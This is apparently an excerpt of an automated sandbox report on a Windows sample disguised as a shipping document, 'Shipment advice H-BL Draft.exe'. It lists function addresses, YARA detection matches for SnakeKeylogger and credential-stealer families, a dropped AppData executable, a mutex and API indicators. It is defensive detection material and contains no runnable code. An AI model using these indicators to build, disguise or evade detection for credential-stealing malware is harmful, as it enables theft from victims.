                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C0D3918_2_056C0D39
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C15E818_2_056C15E8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CE9E018_2_056CE9E0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CC9E018_2_056CC9E0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C15F818_2_056C15F8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CC9F018_2_056CC9F0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CA9F018_2_056CA9F0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CE9D018_2_056CE9D0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C11A018_2_056C11A0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C119018_2_056C1190
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C346018_2_056C3460
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C647818_2_056C6478
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C004018_2_056C0040
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CBC4018_2_056CBC40
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C9C5018_2_056C9C50
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C345018_2_056C3450
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CBC2F18_2_056CBC2F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CFC2018_2_056CFC20
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C602218_2_056C6022
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C9C3F18_2_056C9C3F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C603018_2_056C6030
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CDC3018_2_056CDC30
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C300818_2_056C3008
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C000718_2_056C0007
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CDC1F18_2_056CDC1F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C80E618_2_056C80E6
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CA0E018_2_056CA0E0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C08E018_2_056C08E0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C08F018_2_056C08F0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C80C818_2_056C80C8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CE0C018_2_056CE0C0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CC0C018_2_056CC0C0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CC0D018_2_056CC0D0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CA0D018_2_056CA0D0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C38B818_2_056C38B8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CE0B018_2_056CE0B0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C648818_2_056C6488
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C048918_2_056C0489
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C049818_2_056C0498
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C7B6918_2_056C7B69
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C577018_2_056C5770
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C274918_2_056C2749
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C275818_2_056C2758
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C532818_2_056C5328
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C772018_2_056C7720
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CB32018_2_056CB320
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C230018_2_056C2300
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CF30018_2_056CF300
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CD30018_2_056CD300
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C531A18_2_056C531A
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CD31018_2_056CD310
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C771018_2_056C7710
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CB31018_2_056CB310
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C2FF918_2_056C2FF9
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C97C018_2_056C97C0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C5BD818_2_056C5BD8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CD7A018_2_056CD7A0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C2BA018_2_056C2BA0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CB7A018_2_056CB7A0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C8FA118_2_056C8FA1
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C2BB018_2_056C2BB0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CB7B018_2_056CB7B0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C97B018_2_056C97B0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C578018_2_056C5780
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CF78118_2_056CF781
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CF79018_2_056CF790
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CD79118_2_056CD791
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CCE6F18_2_056CCE6F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C4A6818_2_056C4A68
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C6E6218_2_056C6E62
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CAE7F18_2_056CAE7F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C4A7818_2_056C4A78
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C6E7018_2_056C6E70
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CEE7018_2_056CEE70
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C1A4118_2_056C1A41
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CEE5F18_2_056CEE5F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C1A5018_2_056C1A50
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C462018_2_056C4620
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CAA0018_2_056CAA00
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C6A1818_2_056C6A18
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C461018_2_056C4610
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C22F018_2_056C22F0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CF2F018_2_056CF2F0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C72C818_2_056C72C8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C4EC218_2_056C4EC2
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C4ED018_2_056C4ED0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C1EA818_2_056C1EA8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C72B818_2_056C72B8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CCE8018_2_056CCE80
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C1E9818_2_056C1E98
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CAE9018_2_056CAE90
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Shipment advice H-BL Draft.exe
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000000.1250605088.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebwhC.exe2 vs Shipment advice H-BL Draft.exe
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1317035907.00000000033BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs Shipment advice H-BL Draft.exe
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1324698033.0000000007A90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs Shipment advice H-BL Draft.exe
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1317035907.0000000003173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Shipment advice H-BL Draft.exe
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1325291879.0000000007D10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Shipment advice H-BL Draft.exe
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1317035907.0000000003340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs Shipment advice H-BL Draft.exe
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1314558239.000000000148E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Shipment advice H-BL Draft.exe
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3712482234.0000000000446000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Shipment advice H-BL Draft.exe
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3713690951.0000000000AF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Shipment advice H-BL Draft.exe
                    Source: Shipment advice H-BL Draft.exeBinary or memory string: OriginalFilenamebwhC.exe2 vs Shipment advice H-BL Draft.exe
                    Source: Shipment advice H-BL Draft.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 13.2.Shipment advice H-BL Draft.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 7548, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTRMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                    Source: Shipment advice H-BL Draft.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: PrcGlGVKeUCXxg.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, -----.csBase64 encoded string: 'v0ltr/3dlbbx6irPTVKppc2pWh/8WgMBIACn2VCCzUsYJe8sqS1U2gQ1pbwsMcX0'
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, -----.csBase64 encoded string: 'v0ltr/3dlbbx6irPTVKppc2pWh/8WgMBIACn2VCCzUsYJe8sqS1U2gQ1pbwsMcX0'
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, -----.csBase64 encoded string: 'v0ltr/3dlbbx6irPTVKppc2pWh/8WgMBIACn2VCCzUsYJe8sqS1U2gQ1pbwsMcX0'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, NA6WibgODSO7bBliZq.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, NA6WibgODSO7bBliZq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, NA6WibgODSO7bBliZq.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, C4mUUbO6hDslyPplLx.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, C4mUUbO6hDslyPplLx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/15@3/3
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeFile created: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeMutant created: NULL
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeMutant created: \Sessions\1\BaseNamedObjects\VTUBEvDOt
